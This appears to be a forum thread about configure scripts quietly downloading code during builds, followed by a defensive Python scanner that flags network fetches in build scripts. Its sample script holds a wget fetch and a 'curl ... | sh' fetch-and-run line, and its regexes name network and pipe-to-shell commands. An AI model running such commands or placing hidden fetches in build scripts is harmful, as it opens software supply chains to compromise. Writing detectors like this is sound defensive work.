by fragmede 814 days ago
seems trivial for a configure script to call curl/wget somewhere in the depths of it, no?

Exactly. And at least Cargo will refuse to download a crate which has been yanked. So any crate which has been discovered to be compromised can be yanked, preventing further damage even when someone has already downloaded something which depends on it.

Building packages with up-to-date dependencies is also vastly preferable to building against ancient copies of libraries vendored into a codebase at some point in the past, a situation I see far too often in C/C++ codebases.

Debian’s rules files often deliberately sinkhole the entire network during the build. It’s not the worst idea.
I wonder if you could do it inside the config script without the network.
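A defender-side check in the spirit of the thread above, added here as an example rather than taken from any commenter: a scanner that flags lines in a configure or build script which would reach the network (curl, wget, git clone and similar) and rates a fetch piped straight into a shell as the most serious, so the build can be audited before it is run without the network. The sample script, the `example.invalid` URLs and the command list are constructed for this example.

```python
import re
from collections import namedtuple

# Constructed sample configure-script fragment (not from any real project):
# it quietly fetches a tarball and pipes a remote installer into sh.
SAMPLE_CONFIGURE = """\
#!/bin/sh
# curl is mentioned in this comment only; a comment must not be flagged.
if ! test -f deps/libfoo.tar.gz; then
    wget -q https://example.invalid/libfoo.tar.gz -O deps/libfoo.tar.gz
fi
curl -fsSL https://example.invalid/setup.sh | sh
echo "configure done"
"""

# Commands that reach the network during a build; multi-word ones are phrases.
NETWORK_RE = re.compile(
    r"\bcurl\b|\bwget\b|\bgit\s+clone\b|\bpip3?\s+install\b"
    r"|\bnpm\s+(?:install|ci)\b|\bcargo\s+(?:fetch|install)\b"
)
# A fetched payload piped straight into an interpreter is the riskiest form.
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(?:sudo\s+)?(?:(?:ba|z|da)?sh|python3?)\b")

# severity is "high" when the fetched data is piped to a shell, else "medium"
Finding = namedtuple("Finding", "line_no command severity text")

def strip_comment(line: str) -> str:
    """Drop a trailing '#' comment, ignoring '#' inside quotes (simple heuristic)."""
    out, quote = [], None
    for ch in line:
        if quote:
            quote = None if ch == quote else quote
        elif ch in ("'", '"'):
            quote = ch
        elif ch == "#":
            break
        out.append(ch)
    return "".join(out)

def scan_build_script(script: str) -> list:
    """Return a Finding for each line that invokes a network-fetching command."""
    findings = []
    for n, raw in enumerate(script.splitlines(), start=1):
        code = strip_comment(raw)
        m = NETWORK_RE.search(code)
        if not m:
            continue
        sev = "high" if PIPE_TO_SHELL_RE.search(code) else "medium"
        findings.append(Finding(n, m.group(0), sev, raw.strip()))
    return findings
```

Running `scan_build_script(SAMPLE_CONFIGURE)` reports the `wget` line as medium and the `curl ... | sh` line as high, while the `curl` inside the comment is ignored.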